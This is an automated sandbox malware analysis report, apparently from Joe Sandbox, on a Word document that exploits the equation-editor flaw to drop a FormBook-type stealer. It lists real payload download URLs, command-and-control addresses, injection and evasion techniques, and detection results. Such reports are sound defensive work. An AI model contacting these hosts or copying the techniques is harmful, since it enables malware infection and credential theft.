          Source: explorer.exe, 00000006.00000000.445207583.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.435031021.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.425787862.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.512334695.0000000000750000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.445207583.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.435031021.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.425787862.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.512334695.0000000000750000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeQueries volume information: C:\Users\user\AppData\Roaming\medicomsh78694.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery321Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing12DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 552782 Sample: PO789.doc Startdate: 13/01/2022 Architecture: WINDOWS Score: 100 41 www.danielkcarter.store 2->41 59 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->59 61 Multi AV Scanner detection for domain / URL 2->61 63 Found malware configuration 2->63 65 17 other signatures 2->65 11 EQNEDT32.EXE 11 2->11         started        16 WINWORD.EXE 291 19 2->16         started        signatures3 process4 dnsIp5 49 peak-tv.tk 2.58.149.41, 49167, 80 GBTCLOUDUS Netherlands 11->49 33 C:\Users\user\AppData\...\medicomsh78694.exe, PE32 11->33 dropped 35 C:\Users\user\AppData\...\medicomzx[1].exe, PE32 11->35 dropped 83 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->83 18 medicomsh78694.exe 1 5 11->18         started        37 C:\Users\user\Desktop\~$PO789.doc, data 16->37 dropped 39 ~WRF{828CF0EA-BCAC...1-FE0BC8A11CE4}.tmp, Composite 16->39 dropped file6 signatures7 process8 signatures9 51 Multi AV Scanner detection for dropped file 18->51 53 Machine Learning detection for dropped file 18->53 55 Tries to detect virtualization through RDTSC time measurements 18->55 57 Injects a PE file into a foreign processes 18->57 21 medicomsh78694.exe 18->21         started        process10 signatures11 67 Modifies the context of a thread in another process (thread injection) 21->67 69 Maps a DLL or memory area into another process 21->69 71 Sample uses process hollowing technique 21->71 73 Queues an APC in another process (thread injection) 21->73 24 explorer.exe 21->24 injected process12 dnsIp13 43 www.realstakepool.com 91.195.240.13, 49172, 80 SEDO-ASDE Germany 24->43 45 shops.myshopify.com 23.227.38.74, 49168, 80 CLOUDFLARENETUS Canada 24->45 47 4 other IPs or domains 24->47 75 System process connects to network (likely due to code injection or exploit) 24->75 28 msdt.exe 24->28         started        signatures14 process15 signatures16 77 Modifies the context of a thread in another process (thread injection) 28->77 79 Maps a DLL or memory area into another process 28->79 81 Tries to detect virtualization through RDTSC time measurements 28->81 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO789.doc58%VirustotalBrowse
          PO789.doc54%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp100%AviraEXP/CVE-2017-11882.Gen
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\medicomsh78694.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe34%MetadefenderBrowse
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe51%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          C:\Users\user\AppData\Roaming\medicomsh78694.exe34%MetadefenderBrowse
          C:\Users\user\AppData\Roaming\medicomsh78694.exe51%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.0.medicomsh78694.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.medicomsh78694.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.medicomsh78694.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.medicomsh78694.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          peak-tv.tk5%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.realstakepool.com/md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i0%Avira URL Cloudsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://www.prestigiousuniforms.com/md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i0%Avira URL Cloudsafe
          www.carbonfiber.cloud/md4m/0%Avira URL Cloudsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://peak-tv.tk/medicomzx.exe100%Avira URL Cloudmalware
          http://www.small-icons.com/packs/16x16-free-application-icons.htm0%Avira URL Cloudsafe
          http://splashyfish.com/icons/0%Avira URL Cloudsafe
          http://www.muzicalbox.com/md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i100%Avira URL Cloudmalware
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://led24.de/iconset/0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.extraordinarymiracle.com/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i100%Avira URL Cloudmalware
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          peak-tv.tk
          		2.58.149.41
          		truetrueunknown
          www.extraordinarymiracle.com
          		109.94.209.123
          		truetrue
            		unknown
            www.realstakepool.com
            		91.195.240.13
            		truetrue
              		unknown
              shops.myshopify.com
              		23.227.38.74
              		truetrue
                		unknown
                muzicalbox.com
                		34.102.136.180
                		truefalse
                  		unknown
                  www.danielkcarter.store
                  		172.67.181.75
                  		truefalse
                    		unknown
                    www.muzicalbox.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.prestigiousuniforms.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.realstakepool.com/md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90itrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.prestigiousuniforms.com/md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90itrue
                        • Avira URL Cloud: safe
                        		unknown
                        www.carbonfiber.cloud/md4m/true
                        • Avira URL Cloud: safe
                        		low
                        http://peak-tv.tk/medicomzx.exetrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.muzicalbox.com/md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90ifalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.extraordinarymiracle.com/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90itrue
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.windows.com/pctv.explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpfalse
                          		high
                          http://investor.msn.comexplorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpfalse
                            		high
                            http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpfalse
                              		high
                              http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.434207540.000000000031D000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.445067687.000000000031D000.00000004.00000020.sdmpfalse
                                		high
                                https://visualpharm.com/must_have_icon_set/medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpfalse
                                  		high
                                  https://github.com/proviq/lusrmgr/Chttps://github.com/proviq/lusrmgrmedicomsh78694.exe, 00000004.00000002.423480427.0000000000AD2000.00000020.00020000.sdmp, medicomsh78694.exe, 00000004.00000000.408501370.0000000000AD2000.00000020.00020000.sdmp, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpfalse
                                    		high
                                    http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEMexplorer.exe, 00000006.00000000.450373871.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.430728798.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441314689.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514860954.00000000045D6000.00000004.00000001.sdmpfalse
                                      		high
                                      https://github.com/proviq/lusrmgrmedicomsh78694.exefalse
                                        		high
                                        http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpfalse
                                          		high
                                          http://treyresearch.netexplorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmpfalse
                                            		high
                                            http://p.yusukekamiyamane.com/medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpfalse
                                              		high
                                              http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmpfalse
                                                		high
                                                http://java.sun.comexplorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://github.com/proviq/lusrmgr/medicomsh78694.exefalse
                                                  		high
                                                  http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000006.00000000.512405771.0000000001BE0000.00000002.00020000.sdmpfalse
                                                    		high
                                                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.445007299.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.425426791.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.small-icons.com/packs/16x16-free-application-icons.htmmedicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://splashyfish.com/icons/medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleaexplorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.msn.com/?ocid=iehp01lexplorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://investor.msn.com/explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpfalse
                                                            		high
                                                            http://www.msn.com/?ocid=iehpexplorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.msn.com/de-de/?ocid=iehpexplorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.gnome.org/medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpfalse
                                                                  		high
                                                                  http://www.fatcow.com/free-icons/medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpfalse
                                                                    		high
                                                                    http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441178854.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.445007299.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.425426791.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.450277744.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.512214030.00000000002C7000.00000004.00000020.sdmpfalse
                                                                      		high
                                                                      http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		low
                                                                      http://led24.de/iconset/medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.%s.comPAexplorer.exe, 00000006.00000000.512405771.0000000001BE0000.00000002.00020000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		low
                                                                      http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpfalse
                                                                        		high
                                                                        https://support.mozilla.orgexplorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpfalse
                                                                          		high
                                                                          http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.427812098.0000000003E50000.00000002.00020000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		low

                                                                          Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          2.58.149.41
                                                                          		peak-tv.tkNetherlands
                                                                          		395800GBTCLOUDUStrue
                                                                          23.227.38.74
                                                                          		shops.myshopify.comCanada
                                                                          		13335CLOUDFLARENETUStrue
                                                                          34.102.136.180
                                                                          		muzicalbox.comUnited States
                                                                          		15169GOOGLEUSfalse
                                                                          109.94.209.123
                                                                          		www.extraordinarymiracle.comRussian Federation
                                                                          		202376ARVID-LOGICUMEEtrue
                                                                          91.195.240.13
                                                                          		www.realstakepool.comGermany
                                                                          		47846SEDO-ASDEtrue

                                                                          General Information

                                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                                          Analysis ID:552782
                                                                          Start date:13.01.2022
                                                                          Start time:18:16:09
                                                                          Joe Sandbox Product:CloudBasic
                                                                          Overall analysis duration:0h 12m 44s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Sample file name:PO789.doc
                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                          Number of analysed new started processes analysed:10
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:1
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • HDC enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.expl.evad.winDOC@9/9@6/5
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HDC Information:
                                                                          • Successful, ratio: 14.9% (good quality ratio 13.9%)
                                                                          • Quality average: 68.4%
                                                                          • Quality standard deviation: 29.6%
                                                                          HCA Information:
                                                                          • Successful, ratio: 96%
                                                                          • Number of executed functions: 120
                                                                          • Number of non-executed functions: 36
                                                                          Cookbook Comments:
                                                                          • Adjust boot time
                                                                          • Enable AMSI
                                                                          • Found application associated with file extension: .doc
                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                          • Attach to Office via COM
                                                                          • Scroll down
                                                                          • Close Viewer
                                                                          Warnings:
                                                                          Show All
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                          • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          18:16:18API Interceptor36x Sleep call for process: EQNEDT32.EXE modified
                                                                          18:16:20API Interceptor86x Sleep call for process: medicomsh78694.exe modified
                                                                          18:16:44API Interceptor138x Sleep call for process: msdt.exe modified

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          2.58.149.41Payment Slip.docGet hashmaliciousBrowse
                                                                          • paxz.tk/aguerozx.exe
                                                                          POs_002.docGet hashmaliciousBrowse
                                                                          • kizitox.cf/dozzyzx.exe
                                                                          INQUIRY 12 7.docGet hashmaliciousBrowse
                                                                          • paxz.tk/hussanzx.exe
                                                                          INF.docGet hashmaliciousBrowse
                                                                          • peak-tv.tk/lewiszx.exe
                                                                          12-1-22.docGet hashmaliciousBrowse
                                                                          • paxz.tk/macdonzx.exe
                                                                          002774936211.docGet hashmaliciousBrowse
                                                                          • kizitox.cf/kdotzx.exe
                                                                          10-1-22.docGet hashmaliciousBrowse
                                                                          • paxz.tk/macdonzx.exe
                                                                          INF.docGet hashmaliciousBrowse
                                                                          • peak-tv.tk/lewiszx.exe
                                                                          POs_001.docGet hashmaliciousBrowse
                                                                          • kizitox.cf/dozzyzx.exe
                                                                          quotationNew Order.docGet hashmaliciousBrowse
                                                                          • kizitox.cf/mazx.exe
                                                                          GTP96789.docGet hashmaliciousBrowse
                                                                          • paxz.tk/emezx.exe
                                                                          RFQ8086A_461A_0000086_300_3550_2022.docGet hashmaliciousBrowse
                                                                          • paxz.tk/simonzx.exe
                                                                          MR-CPSeriesMortuaryCorpseRefrigeratorFreezer.docGet hashmaliciousBrowse
                                                                          • kizitox.cf/kdotzx.exe
                                                                          po_02.docGet hashmaliciousBrowse
                                                                          • kizitox.cf/dozzyzx.exe
                                                                          PO-DOC_MDR0307_019.docGet hashmaliciousBrowse
                                                                          • kizitox.cf/plugmanzx.exe
                                                                          Proof of payment.docGet hashmaliciousBrowse
                                                                          • paxz.tk/aguerozx.exe
                                                                          New_Order.doc__.rtfGet hashmaliciousBrowse
                                                                          • paxz.tk/simonzx.exe
                                                                          STATEMENT OF ACCOUNT SEPT-2021-DEC 2021.docGet hashmaliciousBrowse
                                                                          • peak-tv.tk/luizx.exe
                                                                          BANK DETAILS.docGet hashmaliciousBrowse
                                                                          • peak-tv.tk/wealthzx.exe
                                                                          58961575.docGet hashmaliciousBrowse
                                                                          • paxz.tk/emezx.exe

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          www.extraordinarymiracle.comScan_doc.exeGet hashmaliciousBrowse
                                                                          • 109.94.209.123
                                                                          peak-tv.tkINF.docGet hashmaliciousBrowse
                                                                          • 2.58.149.41
                                                                          INF.docGet hashmaliciousBrowse
                                                                          • 2.58.149.41
                                                                          STATEMENT OF ACCOUNT SEPT-2021-DEC 2021.docGet hashmaliciousBrowse
                                                                          • 2.58.149.41
                                                                          BANK DETAILS.docGet hashmaliciousBrowse
                                                                          • 2.58.149.41
                                                                          Remittance Copy PR3805 PR3389 and Due amount.docGet hashmaliciousBrowse
                                                                          • 2.58.149.41
                                                                          Bank Swift.docGet hashmaliciousBrowse
                                                                          • 162.215.241.145
                                                                          RFQ1.docGet hashmaliciousBrowse
                                                                          • 162.215.241.145
